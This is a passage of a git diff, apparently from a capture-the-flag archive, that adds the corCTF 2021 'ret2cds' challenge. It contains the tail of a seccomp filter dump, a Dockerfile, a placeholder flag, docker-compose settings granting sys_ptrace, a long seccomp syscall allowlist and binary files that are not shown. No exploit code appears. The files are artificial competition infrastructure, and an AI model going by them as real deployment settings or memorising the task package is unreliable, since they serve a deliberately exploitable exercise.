0638: 0x15 0x00 0x01 0x00000148 if (A != pwritev2) goto 0640 + 0639: 0x06 0x00 0x00 0x00000000 return KILL + 0640: 0x15 0x00 0x01 0x00000149 if (A != pkey_mprotect) goto 0642 + 0641: 0x06 0x00 0x00 0x00000000 return KILL + 0642: 0x15 0x00 0x01 0x0000014a if (A != pkey_alloc) goto 0644 + 0643: 0x06 0x00 0x00 0x00000000 return KILL + 0644: 0x15 0x00 0x01 0x0000014b if (A != pkey_free) goto 0646 + 0645: 0x06 0x00 0x00 0x00000000 return KILL + 0646: 0x15 0x00 0x01 0x0000014c if (A != statx) goto 0648 + 0647: 0x06 0x00 0x00 0x00000000 return KILL + 0648: 0x06 0x00 0x00 0x7fff0000 return ALLOW diff --git a/2021/corctf/ret2cds/challenge/Dockerfile b/2021/corctf/ret2cds/challenge/Dockerfile new file mode 100644 index 0000000..a12ce6e --- /dev/null +++ b/2021/corctf/ret2cds/challenge/Dockerfile @@ -0,0 +1,24 @@ +FROM ubuntu:20.04 + +ENV DEBIAN_FRONTEND noninteractive + +RUN apt-get update +RUN apt-get install -y openjdk-11-jdk + +RUN useradd -m ret2cds + +COPY ./chall /home/ret2cds +RUN mkdir /opt/nc-java +COPY ./server /opt/nc-java + +RUN chmod 755 /home/ret2cds/* +RUN chmod 754 /home/ret2cds/flag.txt + +RUN chmod 755 /opt/nc-java/* + +COPY ./start.sh /start.sh +RUN chmod 755 /start.sh + +USER ret2cds + +CMD ["/start.sh"] \ No newline at end of file diff --git a/2021/corctf/ret2cds/challenge/chall/flag.txt b/2021/corctf/ret2cds/challenge/chall/flag.txt new file mode 100644 index 0000000..ad56aa4 --- /dev/null +++ b/2021/corctf/ret2cds/challenge/chall/flag.txt @@ -0,0 +1 @@ +fakeflag diff --git a/2021/corctf/ret2cds/challenge/chall/ld-2.31.so b/2021/corctf/ret2cds/challenge/chall/ld-2.31.so new file mode 100755 index 0000000..5e1667d Binary files /dev/null and b/2021/corctf/ret2cds/challenge/chall/ld-2.31.so differ diff --git a/2021/corctf/ret2cds/challenge/chall/libc.so.6 b/2021/corctf/ret2cds/challenge/chall/libc.so.6 new file mode 100755 index 0000000..336c410 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/chall/libc.so.6 differ diff --git a/2021/corctf/ret2cds/challenge/chall/ret2cds b/2021/corctf/ret2cds/challenge/chall/ret2cds new file mode 100755 index 0000000..0d82657 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/chall/ret2cds differ diff --git a/2021/corctf/ret2cds/challenge/docker-compose.yml b/2021/corctf/ret2cds/challenge/docker-compose.yml new file mode 100644 index 0000000..f3b16fb --- /dev/null +++ b/2021/corctf/ret2cds/challenge/docker-compose.yml @@ -0,0 +1,11 @@ +version: '2.4' +services: + ret2cds: + build: . + ports: + - 1337:1337 + restart: always + security_opt: + - seccomp=seccomp.json + cap_add: + - sys_ptrace diff --git a/2021/corctf/ret2cds/challenge/seccomp.json b/2021/corctf/ret2cds/challenge/seccomp.json new file mode 100644 index 0000000..38703fa --- /dev/null +++ b/2021/corctf/ret2cds/challenge/seccomp.json @@ -0,0 +1,1593 @@ +{ + "defaultAction": "SCMP_ACT_ERRNO", + "architectures": [ + "SCMP_ARCH_X86_64", + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ], + "syscalls": [ + { + "name": "process_vm_readv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "process_vm_readv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "process_vm_writev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "accept", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "accept4", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "access", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "alarm", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "bind", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "brk", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "capget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "capset", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chmod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chown32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_getres", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_nanosleep", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "close", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "connect", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "copy_file_range", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "creat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup3", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_create1", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_ctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_ctl_old", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_pwait", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_wait", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_wait_old", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "eventfd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "eventfd2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "execve", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "execveat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "exit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "exit_group", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "faccessat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fadvise64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fadvise64_64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fallocate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fanotify_mark", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchmod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchmodat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchown32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchownat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fcntl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fcntl64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fdatasync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fgetxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "flistxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "flock", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fork", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fremovexattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fsetxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatfs64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fsync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ftruncate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ftruncate64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "futex", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "futimesat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getcpu", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getcwd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getdents", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getdents64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getegid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getegid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "geteuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "geteuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgroups", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgroups32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getitimer", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpeername", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpgrp", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getppid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpriority", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrandom", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrlimit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "get_robust_list", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrusage", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getsid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getsockname", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getsockopt", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "get_thread_area", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "gettid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "gettimeofday", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "inotify_add_watch", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "inotify_init", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "inotify_init1", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "inotify_rm_watch", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_cancel", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ioctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_destroy", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_getevents", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ioprio_get", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ioprio_set", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_setup", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_submit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ipc", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "kill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lchown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lchown32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lgetxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "link", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "linkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "listen", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "listxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "llistxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "_llseek", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lremovexattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lseek", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lsetxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lstat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lstat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "madvise", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "memfd_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mincore", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mkdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mkdirat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mknod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mknodat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mmap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mmap2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mprotect", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_getsetattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_notify", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_open", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_timedreceive", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_timedsend", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_unlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mremap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msgctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msgget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msgrcv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msgsnd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "munlock", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "munlockall", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "munmap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "nanosleep", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "newfstatat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "_newselect", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "open", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "openat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pause", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "personality", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 0, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ] + }, + { + "name": "personality", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 8, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ] + }, + { + "name": "personality", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 4294967295, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ] + }, + { + "name": "pipe", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pipe2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "poll", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ppoll", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "prctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pread64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "preadv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "prlimit64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pselect6", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pwrite64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pwritev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "read", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readahead", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "recv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "recvfrom", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "recvmmsg", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "recvmsg", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "remap_file_pages", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "removexattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rename", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "renameat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "renameat2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "restart_syscall", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rmdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigaction", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigpending", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigprocmask", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigqueueinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigreturn", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigsuspend", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigtimedwait", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_tgsigqueueinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getaffinity", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getparam", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_get_priority_max", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_get_priority_min", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getscheduler", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_rr_get_interval", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_setaffinity", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_setattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_setparam", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_setscheduler", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_yield", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "seccomp", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "select", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "semctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "semget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "semop", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "semtimedop", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "send", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendfile", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendfile64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendmmsg", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendmsg", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendto", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setfsgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setfsgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setfsuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setfsuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgroups", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgroups32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setitimer", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setpgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setpriority", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setregid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setregid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setresgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setresgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setresuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setresuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setreuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setreuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setrlimit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_robust_list", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setsid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setsockopt", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_thread_area", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_tid_address", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shmat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shmctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shmdt", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shmget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shutdown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sigaltstack", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "signalfd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "signalfd4", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sigreturn", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "socket", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "socketcall", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "socketpair", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "splice", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "stat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "stat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "statfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "statfs64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "symlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "symlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sync_file_range", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "syncfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sysinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "syslog", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tee", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tgkill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "time", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_delete", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timerfd_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timerfd_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timerfd_settime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_getoverrun", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_settime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "times", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tkill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "truncate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "truncate64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ugetrlimit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "umask", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "uname", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "unlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "unlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utimensat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utimes", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "vfork", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "vmsplice", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "wait4", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "waitid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "waitpid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "write", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "writev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "arch_prctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "modify_ldt", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chroot", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clone", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ] + } + ] +} diff --git a/2021/corctf/ret2cds/challenge/server/nc-java.jar b/2021/corctf/ret2cds/challenge/server/nc-java.jar new file mode 100755 index 0000000..84073d7 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/server/nc-java.jar differ diff --git a/2021/corctf/ret2cds/challenge/server/slf4j-api-1.7.2.jar b/2021/corctf/ret2cds/challenge/server/slf4j-api-1.7.2.jar new file mode 100755 index 0000000..1a88708 Binary files /dev/null and 